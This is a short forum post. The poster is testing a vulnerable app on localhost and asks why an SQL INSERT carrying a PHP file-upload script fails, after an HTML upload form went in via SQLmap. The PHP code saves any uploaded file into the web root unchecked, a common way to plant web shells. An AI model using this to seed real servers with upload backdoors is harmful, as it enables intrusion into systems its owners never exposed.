Hi to all !
I testing vulnerable app in localhost, and try to insert php upload form code into db table, but give me MySQL syntax error every time i tryed..
This htm form successfully inserted into DB via SQLmap
insert into userform values ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<head>Upload File</head>
<body>
<<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
</body>
</html>');
but this give me SQL syntax error in line 1 every time, when try to insert into DB:
insert into user_upload values ('
<?php
$target_path = '/var/www/';
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file ". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
?>');
Where is the problem.?
I forget to tell that DB tables are allready created into DB exploitdb.